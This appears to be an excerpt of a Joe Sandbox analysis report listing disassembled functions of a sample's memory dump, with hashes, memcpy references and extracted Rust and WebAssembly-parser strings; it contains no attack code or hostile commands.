Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 0-2333694755
Opcode ID: a3c37dfcf1e9183ff8e332d14030c8123c4dd24eb0c386aa2ae3a509edbdd51a
Instruction ID: 66976721662eed9e791ad202494d86ff7a78c630575b68f37a0751744d57b582
Opcode Fuzzy Hash: a3c37dfcf1e9183ff8e332d14030c8123c4dd24eb0c386aa2ae3a509edbdd51a
Instruction Fuzzy Hash: F4728F32608B82C5EB608F11E4503EA77B4FBA5784F504136EA8D9BB99DF3DE1A5C704

Function 00007FF66E272A50 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

.eexportunresolved index in emission: , xrefs: 00007FF66E272C09

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: .eexportunresolved index in emission:
API String ID: 0-3952738300
Opcode ID: a405ef1b4f23eef402c5861237753b5c9e7b6a2aa72974ddd0c93d338f2511d9
Instruction ID: 1916b02ddbfc12d7e0ecd1f4248a216cc4ae5004832c06a31718e387532a943d
Opcode Fuzzy Hash: a405ef1b4f23eef402c5861237753b5c9e7b6a2aa72974ddd0c93d338f2511d9
Instruction Fuzzy Hash: A1B117D2B08652C2EE108A2296403B97775FB60BE8F045231FE6E9B7C1DE3CF1568308

Function 00007FF66E0E2830 Relevance: 1.4, APIs: 1, Instructions: 179COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E0E28BB

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 3db0af232b465546c9d0c2a3b13f95d82b24879ebb7f4fead11ae23106c1dbca
Instruction ID: 7a2ed73e6dc233b269b73c83a6ee6ad61d5a6a6ac6c48b47b65d69d788fde216
Opcode Fuzzy Hash: 3db0af232b465546c9d0c2a3b13f95d82b24879ebb7f4fead11ae23106c1dbca
Instruction Fuzzy Hash: F7613552E19AD2CAFB10866585013FE2B61EB24798F049934EE4E9F7CACE7CD290D354

Function 00007FF66DFD679C Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541ff257fcec1c62a30a0f2912fceba7caa316db9d0ce2e3086d560c05e9e909
Instruction ID: f7cf67924421dff9e17ef1910c9470047abe5bc66fcdca7e2083ff4e6250b6f2
Opcode Fuzzy Hash: 541ff257fcec1c62a30a0f2912fceba7caa316db9d0ce2e3086d560c05e9e909
Instruction Fuzzy Hash: D232D332B0869AC5EA20CB15E4047AA7770FB45BD4F548236EE9D8BB94EF3CE145C744

Function 00007FF66E0E2E00 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911790123ab9d70389e8947397c78e6afbc9c575541e7a7ee7fbf939b58f8b50
Instruction ID: eeeae85075d152baf0a991d88a8692211b0e82e471d6597258f81746823b9eaf
Opcode Fuzzy Hash: 911790123ab9d70389e8947397c78e6afbc9c575541e7a7ee7fbf939b58f8b50
Instruction Fuzzy Hash: 4BC1ACA2E0CED2C4F7668A7494187796EA15B76721F449330E96D9F2E1CF3C9DB18304

Function 00007FF66E0CEA8E Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adff3433ac91e2e2c6fcb71bd2fe2f95089e4e47d7bb8eaf2b6026ed797b53c1
Instruction ID: e3696f0e561db8983098f12fca081a1c4a7c55e1ce5d23ba0a76627e1190b2b2
Opcode Fuzzy Hash: adff3433ac91e2e2c6fcb71bd2fe2f95089e4e47d7bb8eaf2b6026ed797b53c1
Instruction Fuzzy Hash: 2CC1F236B18A85C6EB618B64E000BF96720FB547A4F448631EBAE9BBD1DF3CD545C341

Function 00007FF66DFDA78B Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df81040f3822bf8f896d39e1f734d0ac8a56abe0e474f45979fa09b41f6a469e
Instruction ID: f5057723cb2a39504f608e57e2d3958cf8dccd7dfcc638851b16764de8e76729
Opcode Fuzzy Hash: df81040f3822bf8f896d39e1f734d0ac8a56abe0e474f45979fa09b41f6a469e
Instruction Fuzzy Hash: 3DB1E322A1D795C5EA60CB15E404BAAB3B0FB95B84F544231EE9D8BB94EF3CD186C704

Function 00007FF66DFB7070 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd25df926a26cc26fa987fe5f990772751d892c699f429a67ac87972d362c4b
Instruction ID: cb35501751368a272f310fb970e2682e4ed87cb08c204a0463d9c4af48190abe
Opcode Fuzzy Hash: dfd25df926a26cc26fa987fe5f990772751d892c699f429a67ac87972d362c4b
Instruction Fuzzy Hash: 4B512A57F2DAE1DAE311877984006AD3F729BE6748F08C0B5DA845BBDACA3EC105D711

Function 00007FF66DFB8F00 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a2081e78611e45f47f1aa7975277132279a70a0c576d2d19a2e3981c294dc2
Instruction ID: 0731862e32191fe8ccb708cfaee40a9aba02e2e353be8938bc1d43c7be052364
Opcode Fuzzy Hash: 71a2081e78611e45f47f1aa7975277132279a70a0c576d2d19a2e3981c294dc2
Instruction Fuzzy Hash: E5312656B2556382FE69813A8D14B754A935B857F0F589330ED3ECFBD8FD3C99424200

Function 00007FF66E492748 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7906608fd44422f96e14d677eed26ab4c0e02accd03b5c7e13c58568574530ff
Instruction ID: 956d1d4b8d28a861d561a6d68c3d5f4309a8e60aafaabc73f1d42b816fe9fa53
Opcode Fuzzy Hash: 7906608fd44422f96e14d677eed26ab4c0e02accd03b5c7e13c58568574530ff
Instruction Fuzzy Hash: A1F0128BD0EEC39AF29341745E251191FE06F73A2470D42BBDAA8BB2D7DD095905831E

Function 00007FF66DFC90A3 Relevance: 19.1, APIs: 15, Instructions: 322COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66DFC944D
memcpy.MSVCRT ref: 00007FF66DFC9463
memcpy.MSVCRT ref: 00007FF66DFC94DC
memcpy.MSVCRT ref: 00007FF66DFC9516
memcpy.MSVCRT ref: 00007FF66DFC952C
memcpy.MSVCRT ref: 00007FF66DFC95C3
memcpy.MSVCRT ref: 00007FF66DFC95D9
memcpy.MSVCRT ref: 00007FF66DFC9675

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 4277ce5df32a28979e2520d44abf2c8191dce2745f8c294398660aa16ba42cb9
Instruction ID: 0140972bd97fcdedc25f287ab40cf9cb555f6a9eae0a78e9c2beb7ea0e9a436f
Opcode Fuzzy Hash: 4277ce5df32a28979e2520d44abf2c8191dce2745f8c294398660aa16ba42cb9
Instruction Fuzzy Hash: 9DF16F2260DAC1D1E7219B25D0443EAA7B5FB96B88F448121DFCC4BB9AEF39D695C700

Function 00007FF66E218833 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E218C16
memcpy.MSVCRT ref: 00007FF66E218CC4
memcpy.MSVCRT ref: 00007FF66E218CD5
memcpy.MSVCRT ref: 00007FF66E218D1E
memcpy.MSVCRT ref: 00007FF66E218DF4
memcpy.MSVCRT ref: 00007FF66E218ECF

Strings

expected keyword `rec``rec`expected keyword `acq_rel`repexpected keyword `rep`expected keyword `resource``resource`expected keyword `resource.new``resource.new`expected keyword `resource.drop``resource.drop`expected keyword `resource.rep``resource.rep`expected, xrefs: 00007FF66E218E2D
expected `(`, xrefs: 00007FF66E218B79
expected `)`item nesting too deep, xrefs: 00007FF66E218D87
recacq_relresourceresource.newresource.dropresource.repseq_cstsharedstartsubswitchfinal, xrefs: 00007FF66E218913

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: expected `(`$expected `)`item nesting too deep$expected keyword `rec``rec`expected keyword `acq_rel`repexpected keyword `rep`expected keyword `resource``resource`expected keyword `resource.new``resource.new`expected keyword `resource.drop``resource.drop`expected keyword `resource.rep``resource.rep`expected$recacq_relresourceresource.newresource.dropresource.repseq_cstsharedstartsubswitchfinal
API String ID: 3510742995-3382110302
Opcode ID: fe135cbe99bf4eaacbef4a2d6781c19827130da55ea2f588fb493ee87e5b7e5d
Instruction ID: 14ac5b2ba31e7794e85333520bd534737dbad604da96083aadf96232df327d3c
Opcode Fuzzy Hash: fe135cbe99bf4eaacbef4a2d6781c19827130da55ea2f588fb493ee87e5b7e5d
Instruction Fuzzy Hash: F1025922A0CAC1C1E6658B19E5403EAB374FBA9B48F449121EBCC47B59EF39D295CB00

Function 00007FF66E059045 Relevance: 10.8, APIs: 5, Strings: 2, Instructions: 300COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E059161
memcpy.MSVCRT ref: 00007FF66E05925D
memcpy.MSVCRT ref: 00007FF66E0592D5
memcpy.MSVCRT ref: 00007FF66E05932B
memcpy.MSVCRT ref: 00007FF66E05937C

Strings

assertion failed: *op == SseOpcode::Blendvpd || *op == SseOpcode::Blendvps || *op == SseOpcode::Pblendvb, xrefs: 00007FF66E059879
assertion failed: end >= start && end <= len, xrefs: 00007FF66E059757

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: *op == SseOpcode::Blendvpd || *op == SseOpcode::Blendvps || *op == SseOpcode::Pblendvb$assertion failed: end >= start && end <= len
API String ID: 3510742995-3011230143
Opcode ID: 033a67036a1f1fe4f634fcfb2566d8239946ab7c374f2d7215186b47d47ad841
Instruction ID: 6d6eeec96a4dd0936b3eb81247506f9d05d32162d3e8b1d0f864a2a5cb386252
Opcode Fuzzy Hash: 033a67036a1f1fe4f634fcfb2566d8239946ab7c374f2d7215186b47d47ad841
Instruction Fuzzy Hash: CDD1EFB2B08B82C5EA00DF15E5403A97375FB64B84F948132EA5D8B795EF3CE55AC308

Function 00007FF66E094797 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E094AD6
memcpy.MSVCRT ref: 00007FF66E094BC6
memcpy.MSVCRT ref: 00007FF66E094C4E

Strings

q, xrefs: 00007FF66E094AF7
@, xrefs: 00007FF66E0949BA
q, xrefs: 00007FF66E094C81

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: @$q$q
API String ID: 3510742995-844641622
Opcode ID: 0130b3ffb870c2bd7e336783ea1e127eaab3c162c12a58bfbe23b4368bbd4416
Instruction ID: 26bf7b8eaeeac75167122519e03e2209c10c0ecb1e78b1bc2168741ea5d9bd9e
Opcode Fuzzy Hash: 0130b3ffb870c2bd7e336783ea1e127eaab3c162c12a58bfbe23b4368bbd4416
Instruction Fuzzy Hash: A7E1BF72A1CAC6D1DA219B11E0443EFA760FBA9784F405126EBDD9BB8ADF3CD149C704

Function 00007FF66E14F002 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 156COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E14F08D
memcpy.MSVCRT ref: 00007FF66E14F0B0
memcpy.MSVCRT ref: 00007FF66E14F1E1

Strings

assertion failed: old_right_len + count <= CAPACITY, xrefs: 00007FF66E14F258
assertion failed: count > 0, xrefs: 00007FF66E14F240
assertion failed: old_left_len >= count, xrefs: 00007FF66E14F270

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: count > 0$assertion failed: old_left_len >= count$assertion failed: old_right_len + count <= CAPACITY
API String ID: 3510742995-2932549692
Opcode ID: dc3c6dbfda9fa088675994ba030a625ea1ea81b83474131b5a017887a3be6f6f
Instruction ID: d97bfebddcd51ff946cfc3d9c9d5f8ab310fb1583de5e32e28c758fc0a40b517
Opcode Fuzzy Hash: dc3c6dbfda9fa088675994ba030a625ea1ea81b83474131b5a017887a3be6f6f
Instruction Fuzzy Hash: E261E176A18B85C6EA11CB55E8413E9A370FBA8B98F545132EF5C4B754EF3CD296C300

Function 00007FF66E14E8A2 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 141COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E14E92C
memcpy.MSVCRT ref: 00007FF66E14E945
memcpy.MSVCRT ref: 00007FF66E14EA20

Strings

assertion failed: old_right_len + count <= CAPACITY, xrefs: 00007FF66E14EA8A
assertion failed: count > 0, xrefs: 00007FF66E14EA72
assertion failed: old_left_len >= count, xrefs: 00007FF66E14EAA2

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
